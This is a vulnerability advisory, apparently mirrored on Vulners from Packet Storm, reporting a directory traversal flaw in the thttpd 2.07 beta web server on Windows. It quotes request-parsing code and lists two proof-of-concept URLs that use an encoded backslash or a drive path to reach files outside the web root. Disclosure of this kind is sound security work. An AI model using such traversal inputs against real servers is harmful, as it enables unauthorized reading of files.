Lucene search
K

thttp207.txt

🗓️ 05 Aug 2004 00:00:00Reported by CoolICEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Directory traversal vulnerability in thttpd version 2.07 beta on Windows discovered on 2004-08-04.

Code
`Application: thttpd  
Vendors: http://www.acme.com/software/thttpd/  
Version: 2.07 beta 0.4 10dec99  
Platforms: Windows  
Bug: Directory Traversal  
Date: 2004-08-04  
Author: CoolICE  
e-mail: CoolICE#China.com  
================  
Content:  
in libhttpd.c:  
int  
httpd_parse_request( httpd_conn* hc )  
[...]  
if ( hc->decodedurl[0] != '/' )  
{  
httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );  
return -1;  
}  
  
static int  
really_start_request( httpd_conn* hc )  
[...]  
if ( stat( hc->expnfilename, &hc->sb ) < 0 )  
{  
httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );  
return -1;  
}  
------------------  
TestCode:  
http://localhost/%5c../test.ini  
http://localhost/c:\test.ini  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2004 00:00Current
7.4High risk
Vulners AI Score7.4
22